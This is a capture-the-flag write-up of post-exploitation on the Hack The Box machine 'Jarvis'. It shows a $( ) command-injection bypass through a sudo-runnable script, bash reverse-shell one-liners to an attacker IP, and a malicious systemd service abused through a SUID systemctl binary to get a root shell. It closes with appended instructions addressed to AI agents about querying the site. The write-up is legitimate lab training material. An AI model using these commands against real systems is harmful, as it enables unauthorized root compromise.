# Post Exploitation

## Privilege Escalation

Analyzing what commands we cun run we note the following

```
www-data@jarvis:/var/www/Admin-Utilities$ sudo -l 
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/Admin-Utilities$ 
```

We see that we cun runn simpler.py as pepper. Analyzing that file we learn that it does not filter the '$' character, we can take advantage of that as follows.&#x20;

```
www-data@jarvis:/var/www/Admin-Utilities$ ping $(whoami)
ping: www-data: Temporary failure in name resolution
```

Whatever is in the parenthesis will be executed first.&#x20;

```
www-data@jarvis:/$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
```

![](/files/-MMNPLpGY4PF90D_PD0s)

Running the following gave me a better shell

```
bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
```

![](/files/-MMNQoPLGg_6lK54PhpP)

Running LinEnum.sh, we learn the following:

![](/files/-MMNUEVYwtrUGxVohY8B)

&#x20;The *systemctl* binary has the setuid bit set and it’s owned by root. We can use that to our advantage and escalate to root privileges. If you’re not sure how to do that, you can search the binary name on [GTFOBins](https://gtfobins.github.io/) and check how the suid bit can be used to escalate privileges.

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

### Steps to create a service

On our attacker machine, create the following. *root.service* with the following content

```
[Unit]
Description=get root privilege

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/9999 0>&1'

[Install]
WantedBy=multi-user.target
```

Copy it to our target machine and run the following:

```
/bin/systemctl enable /home/pepper/root.service
```

Set up your listener and run the following to start the service

```
/bin/systemctl start root
```

![](/files/-MMNYSSGy6m-omavpbJF)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/jarvis/post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.